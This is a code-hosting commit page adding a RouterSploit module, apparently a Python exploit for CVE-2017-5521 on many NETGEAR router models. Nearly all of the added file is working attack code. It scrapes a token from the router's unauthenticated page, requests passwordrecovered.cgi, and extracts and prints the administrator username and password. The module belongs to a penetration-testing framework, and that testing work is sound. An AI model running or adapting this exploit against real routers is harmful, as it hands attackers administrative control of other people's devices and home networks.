Skip to content

R
routersploit
Commit 27ca5b19 by Laurent Meirlaen
Options

netgear multi devices password disclosure

parent b3ec1e82
Showing with 122 additions and 0 deletions
routersploit/modules/exploits/netgear/multi_password_disclosure-201701.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_error,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for multiple NETGEAR routers password disclosure vulnerability.
If the target is vulnerable, it allows read credentials for administration user.
"""
__info__ = {
'name': 'Netgear Multiple Vulnerabilities',
'description': 'Remote and Local Password Disclosure.',
'authors': [
'Simon Kenin of Trustwave SpiderLabs', # vulnerability discovery
'0BuRner', # routersploit module
],
'references': [
'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911',
'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/',
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521',
'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521',
'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability'
],
'devices': [
'R8500',
'R8300',
'R7000',
'R6400',
'R7300DST',
'R7100LG',
'R6300v2',
'WNDR3400v3',
'WNR3500Lv2',
'R6250',
'R6700',
'R6900',
'R8000',
'R7900',
'WNDR4500v2',
'R6200v2',
'WNDR3400v2',
'D6220',
'D6400',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
model = response.headers.get('WWW-Authenticate')[13:-1]
print_status("Detected Netgear model: {}".format(model))
token = self.extract_token(response.text)
if token is False:
token = "routersploit"
else:
print_status("Token found: {}".format(token))
url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token)
response = http_request(method="POST", url=url)
if response.text.find('left\">') != -1:
username, password = self.extract_password(response.text)
print_success('Exploit success! login: {}, password: {}'.format(username, password))
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Target is not vulnerable")
@staticmethod
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return False
@staticmethod
def extract_token(html):
return Exploit.scrape(html, 'unauth.cgi?id=', '\"')
@staticmethod
def extract_password(html):
username = (repr(Exploit.scrape(html, 'Router Admin Username</td>', '</td>')))
username = Exploit.scrape(username, '>', '\'')
password = (repr(Exploit.scrape(html, 'Router Admin Password</td>', '</td>')))
password = Exploit.scrape(password, '>', '\'')
if username is False:
username = (Exploit.scrape(html[html.find('left\">'):-1], 'left\">', '</td>'))
password = (Exploit.scrape(html[html.rfind('left\">'):-1], 'left\">', '</td>'))
password = password.replace("&#35;", "#").replace("&#38;", "&")
return username, password
@mute
def check(self):
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
if response.headers.get('WWW-Authenticate') is not None:
return 'unauth.cgi?id=' in response.text # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment